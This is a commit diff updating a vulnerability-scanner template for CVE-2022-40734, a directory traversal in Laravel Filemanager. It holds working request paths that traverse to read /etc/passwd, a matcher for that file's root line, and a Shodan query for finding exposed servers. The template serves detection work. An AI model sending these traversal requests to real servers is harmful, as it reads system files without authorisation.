Update CVE-2022-40734.yaml

2022-09-15 14:24:40 +05:30 · 2022-09-15 14:24:40 +05:30 · 4f7d31b4ec
parent 0d3cbfcc36
commit 4f7d31b4ec
1 changed files with 8 additions and 10 deletions
--- a/cves/2022/CVE-2022-40734.yaml
+++ b/cves/2022/CVE-2022-40734.yaml
@ -1,18 +1,20 @@
 id: CVE-2022-40734

 info:
-  name: UniSharp aka Laravel Filemanager v2.5.1 - Directory Traversal.  
+  name: UniSharp aka Laravel Filemanager v2.5.1 - Directory Traversal
  author: arafatansari
+  severity: high
  description: |
    UniSharp laravel-filemanager (aka Laravel Filemanager) through 2.5.1 allows download?working_dir=%2F.. directory traversal to read arbitrary files.
-  severity: high
  reference:
-    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40734
    - https://github.com/UniSharp/laravel-filemanager/issues/1150
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-40734
+  classification:
+    cve-id: CVE-2022-40734
  metadata:
-    shodan-query: http.html:"Laravel Filemanager"
    verified: true
-  tags: traversal,unauthenticated,laravel,unisharp,cve,2022
+    shodan-query: http.html:"Laravel Filemanager"
+  tags: cve,cve2022,laravel,unisharp,lfi,traversal

 requests:
  - method: GET
@ -20,12 +22,8 @@ requests:
      - "{{BaseURL}}/download?working_dir=%2F../../../../../../../../../../../../../../../../../../../etc&type=Files&file=passwd"
      - "{{BaseURL}}/laravel-filemanager/download?working_dir=%2F../../../../../../../../../../../../../../../../../../../etc&type=Files&file=passwd"

-    matchers-condition: and
+    stop-at-first-match: true
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"
-
-      - type: status
-        status:
-          - 200